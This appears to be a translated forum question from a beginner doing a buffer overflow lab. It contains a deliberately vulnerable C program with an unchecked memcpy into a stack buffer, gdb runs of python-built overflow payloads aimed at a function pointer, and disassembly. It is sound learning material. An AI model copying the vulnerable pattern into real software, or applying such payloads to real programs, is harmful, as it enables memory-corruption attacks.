如何解决为什么我的 gdb 转换为错误的十六进制值?
(gdb) run `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Starting program: /home/xxx/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Off to 0x56556155
Program received signal SIGSEGV,Segmentation fault.
0x56556155 in register_tm_clones ()
(gdb) run `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Off to 0x55618dc3
Program received signal SIGSEGV,Segmentation fault.
0x55618dc3 in ?? ()
当我在有效载荷中包含 \x55\x61\x55\x56 时,我在 0x56556155 处得到分段错误,但是当我在有效载荷中包括 \xcd\x61\x55\x56 时,我在 0x55618dc3 处得到分段错误。 我在想 \xcd\x61\x55\x56 会给 seg。故障在 0x565561cd。 当我在 Arch Linux 中使用 gdb 时,我只能重现这个。在 Kali linux 中,这按预期工作,我成功地通过覆盖 EBP 来运行一个函数,但在 Arch linux 中却没有。
另一个不起作用的有效负载示例:
(gdb) run `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Off to 0x5561aac2
Program received signal SIGSEGV,Segmentation fault.
0x5561aac2 in ?? ()
源代码:
#include <stdio.h>
#include <string.h>
int BUFFER=500;
void win(void){
/*Win Condition
We Want to jump here
*/
printf("\n ===== Win ===== \n\n");
}
void lose(void){
/* Lose Condition */
printf("Current Memory Address is %p\n",lose);
printf("Aim for %p\n",win);
printf("Lose :(\n");
}
int main(int argc,char* argv[]){
/* Main Function*/
//Pointer to the lose function
void (*fp)(void) = lose;
char buffer[BUFFER];
if (argc != 2){
printf("Overflow the buffer\n");
printf("Hint! Try `python -c \"print 'A'*100\"`\n");
return -1;
}
memcpy(buffer,argv[1],strlen(argv[1]));
printf("Off to %p\n",fp);
fp();
return 0;
}
拆解:
(gdb) disassemble main
Dump of assembler code for function main:
0x56556254 <+0>: lea ecx,[esp+0x4]
0x56556258 <+4>: and esp,0xfffffff0
0x5655625b <+7>: push DWORD PTR [ecx-0x4]
0x5655625e <+10>: push ebp
0x5655625f <+11>: mov ebp,esp
0x56556261 <+13>: push edi
0x56556262 <+14>: push esi
0x56556263 <+15>: push ebx
0x56556264 <+16>: push ecx
0x56556265 <+17>: sub esp,0x18
0x56556268 <+20>: call 0x565560d0 <__x86.get_pc_thunk.bx>
0x5655626d <+25>: add ebx,0x2d93
0x56556273 <+31>: mov esi,ecx
0x56556275 <+33>: mov eax,esp
0x56556277 <+35>: mov edi,eax
0x56556279 <+37>: lea eax,[ebx-0x2e08]
0x5655627f <+43>: mov DWORD PTR [ebp-0x1c],eax
0x56556282 <+46>: mov eax,DWORD PTR [ebx+0x28]
0x56556288 <+52>: lea edx,[eax-0x1]
0x5655628b <+55>: mov DWORD PTR [ebp-0x20],edx
0x5655628e <+58>: mov edx,eax
0x56556290 <+60>: mov eax,0x10
0x56556295 <+65>: sub eax,0x1
0x56556298 <+68>: add eax,edx
0x5655629a <+70>: mov ecx,0x10
0x5655629f <+75>: mov edx,0x0
0x565562a4 <+80>: div ecx
0x565562a6 <+82>: imul eax,eax,0x10
0x565562a9 <+85>: sub esp,eax
0x565562ab <+87>: mov eax,esp
0x565562ad <+89>: add eax,0x0
0x565562b0 <+92>: mov DWORD PTR [ebp-0x24],eax
0x565562b3 <+95>: cmp DWORD PTR [esi],0x2
0x565562b6 <+98>: je 0x565562e3 <main+143>
0x565562b8 <+100>: sub esp,0xc
0x565562bb <+103>: lea eax,[ebx-0x1fb2]
0x565562c1 <+109>: push eax
0x565562c2 <+110>: call 0x56556060 <puts@plt>
0x565562c7 <+115>: add esp,0x10
0x565562ca <+118>: sub esp,0xc
0x565562cd <+121>: lea eax,[ebx-0x1f9c]
0x565562d3 <+127>: push eax
0x565562d4 <+128>: call 0x56556060 <puts@plt>
0x565562d9 <+133>: add esp,0x10
0x565562dc <+136>: mov eax,0xffffffff
0x565562e1 <+141>: jmp 0x5655632e <main+218>
0x565562e3 <+143>: mov eax,DWORD PTR [esi+0x4]
0x565562e6 <+146>: add eax,0x4
0x565562e9 <+149>: mov eax,DWORD PTR [eax]
0x565562eb <+151>: sub esp,0xc
0x565562ee <+154>: push eax
0x565562ef <+155>: call 0x56556070 <strlen@plt>
0x565562f4 <+160>: add esp,0x10
0x565562f7 <+163>: mov edx,DWORD PTR [esi+0x4]
0x565562fa <+166>: add edx,0x4
0x565562fd <+169>: mov edx,DWORD PTR [edx]
0x565562ff <+171>: sub esp,0x4
0x56556302 <+174>: push eax
0x56556303 <+175>: push edx
0x56556304 <+176>: push DWORD PTR [ebp-0x24]
0x56556307 <+179>: call 0x56556050 <memcpy@plt>
0x5655630c <+184>: add esp,0x10
0x5655630f <+187>: sub esp,0x8
0x56556312 <+190>: push DWORD PTR [ebp-0x1c]
0x56556315 <+193>: lea eax,[ebx-0x1f76]
0x5655631b <+199>: push eax
0x5655631c <+200>: call 0x56556040 <printf@plt>
0x56556321 <+205>: add esp,0x10
0x56556324 <+208>: mov eax,DWORD PTR [ebp-0x1c]
0x56556327 <+211>: call eax
0x56556329 <+213>: mov eax,0x0
0x5655632e <+218>: mov esp,edi
0x56556330 <+220>: lea esp,[ebp-0x10]
0x56556333 <+223>: pop ecx
0x56556334 <+224>: pop ebx
0x56556335 <+225>: pop esi
0x56556336 <+226>: pop edi
0x56556337 <+227>: pop ebp
0x56556338 <+228>: lea esp,[ecx-0x4]
0x5655633b <+231>: ret
End of assembler dump.
(gdb) disassemble lose
Dump of assembler code for function win:
0x565561cd <+0>: push ebp
0x565561ce <+1>: mov ebp,esp
0x565561d0 <+3>: push ebx
0x565561d1 <+4>: sub esp,0x4
0x565561d4 <+7>: call 0x5655633c <__x86.get_pc_thunk.ax>
0x565561d9 <+12>: add eax,0x2e27
0x565561de <+17>: sub esp,0xc
0x565561e1 <+20>: lea edx,[eax-0x1ff8]
0x565561e7 <+26>: push edx
0x565561e8 <+27>: mov ebx,eax
0x565561ea <+29>: call 0x56556060 <puts@plt>
0x565561ef <+34>: add esp,0x10
0x565561f2 <+37>: nop
0x565561f3 <+38>: mov ebx,DWORD PTR [ebp-0x4]
0x565561f6 <+41>: leave
0x565561f7 <+42>: ret
End of assembler dump.
(gdb) disassemble lose
Dump of assembler code for function lose:
0x565561f8 <+0>: push ebp
0x565561f9 <+1>: mov ebp,esp
0x565561fb <+3>: push ebx
0x565561fc <+4>: sub esp,0x4
0x565561ff <+7>: call 0x565560d0 <__x86.get_pc_thunk.bx>
0x56556204 <+12>: add ebx,0x2dfc
0x5655620a <+18>: sub esp,0x8
0x5655620d <+21>: lea eax,[ebx-0x2e08]
0x56556213 <+27>: push eax
0x56556214 <+28>: lea eax,[ebx-0x1fe4]
0x5655621a <+34>: push eax
0x5655621b <+35>: call 0x56556040 <printf@plt>
0x56556220 <+40>: add esp,0x10
0x56556223 <+43>: sub esp,0x8
0x56556226 <+46>: lea eax,[ebx-0x2e33]
0x5655622c <+52>: push eax
0x5655622d <+53>: lea eax,[ebx-0x1fc6]
0x56556233 <+59>: push eax
0x56556234 <+60>: call 0x56556040 <printf@plt>
0x56556239 <+65>: add esp,0x10
0x5655623c <+68>: sub esp,0xc
0x5655623f <+71>: lea eax,[ebx-0x1fba]
0x56556245 <+77>: push eax
0x56556246 <+78>: call 0x56556060 <puts@plt>
0x5655624b <+83>: add esp,0x10
0x5655624e <+86>: nop
0x5655624f <+87>: mov ebx,DWORD PTR [ebp-0x4]
0x56556252 <+90>: leave
0x56556253 <+91>: ret
End of assembler dump.
我做错了什么?我对汇编语言和缓冲区溢出很陌生,请放轻松。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。